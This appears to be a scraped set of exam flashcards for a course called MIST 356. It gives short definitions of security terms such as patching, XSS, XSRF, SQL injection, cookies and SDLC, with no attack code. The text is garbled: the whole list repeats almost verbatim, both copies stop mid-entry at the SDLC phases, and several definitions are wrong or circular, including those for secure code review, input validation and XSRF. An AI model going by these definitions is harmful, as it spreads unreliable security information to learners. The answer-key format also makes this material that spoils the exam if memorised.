MIST 356 COMPREHENSIVE EXAM QUESTIONS AND
ANSWERS GRADED A+
✔✔Patch Management - ✔✔the planning, testing, implementing, and auditing of
patches
✔✔Hotfix - ✔✔patch a single problem to an OS or an application
✔✔Configuration Baselines - ✔✔the process of measuring changes in networking,
hardware, software, etc.
✔✔"Patch Tuesday" - ✔✔Microsoft's release of major patches on Tuesday. A nightmare
day for system admins
✔✔Ext4 - ✔✔name of the Linux file system
✔✔Security Zones - ✔✔internet explorer. Can group sites by security classification:
internet, local intranet, trusted sites, restricted sites
✔✔Security Templates - ✔✔good way to enforce browser security on a large group of
computers
✔✔Proxy Server - ✔✔a go-between for clients on the network and the internet
✔✔Hardening HDDs - ✔✔- Remove temporary files
- Periodically check system files
- Defragment drives
- Back up data
- System restore
- Whole disk encryption
✔✔XSS (Cross Site Scripting) - ✔✔where a threat actor manipulates a client computer
into executing code considered trusted as if it came from the server the client was
connected to
✔✔Browse Security - ✔✔- Implement policies
- Train users
- Use a proxy and content filter
- Secure against malicious code
✔✔XSRF (cross-site request forgery) - ✔✔An attack that causes users to perform
actions on websites without their knowledge. In some cases, attackers use header
manipulation to steal cookies and harvest passwords.
, ✔✔LSOs (Locally Shared Objects) - ✔✔similar to cookies. Data stored by Adobe Flash-
based websites
✔✔UAC (User Account Control) - ✔✔a security components of Windows Vista and
newer versions that keeps every user (besides admin account) in standard user mode
instead of as an admin with full administrative rights
✔✔SDLC (Software Development Life Cycle) - ✔✔an organized process of developing
a secure application throughout the life of the project
✔✔Session Cookies - ✔✔good - they maintain site information, authentication
information. When you exit and go back to amazon and still have your cart loaded
✔✔Agile - ✔✔breaks work into small increments and is designed to be more adaptive to
change. Has a focus on customer satisfaction
✔✔Tracking Cookies - ✔✔good or bad - maintains information about you and what data
your computer has accessed. Often used by marketing professionals, but can also be
used maliciously
✔✔DevOPS Principles - ✔✔the collaboration between Development and Operations
groups for coding, testing, and releasing software
✔✔Session Hijacking - ✔✔the ugly - a threat actor stole or compromised your session
cookie and hijacked your session
✔✔Secure Code Review - ✔✔this enables the company to prioritize threats to an
application based upon their use and impact
✔✔Least Privilege - ✔✔users should have only access to what they need, and no more
✔✔Input Validation - ✔✔ensures that only user input into the program is validated
before accepting
✔✔SQL Injection - ✔✔injecting SQL commands via the browser to a user input field. A
common hack
✔✔Directory Traversal - ✔✔sending commands via user input to gain unauthorized
access to server or system directories
✔✔Buffer Overflow - ✔✔providing more data into a user field than the program is
designed to accept
✔✔SDLC Phases - ✔✔- Planning and Analysis
ANSWERS GRADED A+
✔✔Patch Management - ✔✔the planning, testing, implementing, and auditing of
patches
✔✔Hotfix - ✔✔patch a single problem to an OS or an application
✔✔Configuration Baselines - ✔✔the process of measuring changes in networking,
hardware, software, etc.
✔✔"Patch Tuesday" - ✔✔Microsoft's release of major patches on Tuesday. A nightmare
day for system admins
✔✔Ext4 - ✔✔name of the Linux file system
✔✔Security Zones - ✔✔internet explorer. Can group sites by security classification:
internet, local intranet, trusted sites, restricted sites
✔✔Security Templates - ✔✔good way to enforce browser security on a large group of
computers
✔✔Proxy Server - ✔✔a go-between for clients on the network and the internet
✔✔Hardening HDDs - ✔✔- Remove temporary files
- Periodically check system files
- Defragment drives
- Back up data
- System restore
- Whole disk encryption
✔✔XSS (Cross Site Scripting) - ✔✔where a threat actor manipulates a client computer
into executing code considered trusted as if it came from the server the client was
connected to
✔✔Browse Security - ✔✔- Implement policies
- Train users
- Use a proxy and content filter
- Secure against malicious code
✔✔XSRF (cross-site request forgery) - ✔✔An attack that causes users to perform
actions on websites without their knowledge. In some cases, attackers use header
manipulation to steal cookies and harvest passwords.
, ✔✔LSOs (Locally Shared Objects) - ✔✔similar to cookies. Data stored by Adobe Flash-
based websites
✔✔UAC (User Account Control) - ✔✔a security components of Windows Vista and
newer versions that keeps every user (besides admin account) in standard user mode
instead of as an admin with full administrative rights
✔✔SDLC (Software Development Life Cycle) - ✔✔an organized process of developing
a secure application throughout the life of the project
✔✔Session Cookies - ✔✔good - they maintain site information, authentication
information. When you exit and go back to amazon and still have your cart loaded
✔✔Agile - ✔✔breaks work into small increments and is designed to be more adaptive to
change. Has a focus on customer satisfaction
✔✔Tracking Cookies - ✔✔good or bad - maintains information about you and what data
your computer has accessed. Often used by marketing professionals, but can also be
used maliciously
✔✔DevOPS Principles - ✔✔the collaboration between Development and Operations
groups for coding, testing, and releasing software
✔✔Session Hijacking - ✔✔the ugly - a threat actor stole or compromised your session
cookie and hijacked your session
✔✔Secure Code Review - ✔✔this enables the company to prioritize threats to an
application based upon their use and impact
✔✔Least Privilege - ✔✔users should have only access to what they need, and no more
✔✔Input Validation - ✔✔ensures that only user input into the program is validated
before accepting
✔✔SQL Injection - ✔✔injecting SQL commands via the browser to a user input field. A
common hack
✔✔Directory Traversal - ✔✔sending commands via user input to gain unauthorized
access to server or system directories
✔✔Buffer Overflow - ✔✔providing more data into a user field than the program is
designed to accept
✔✔SDLC Phases - ✔✔- Planning and Analysis
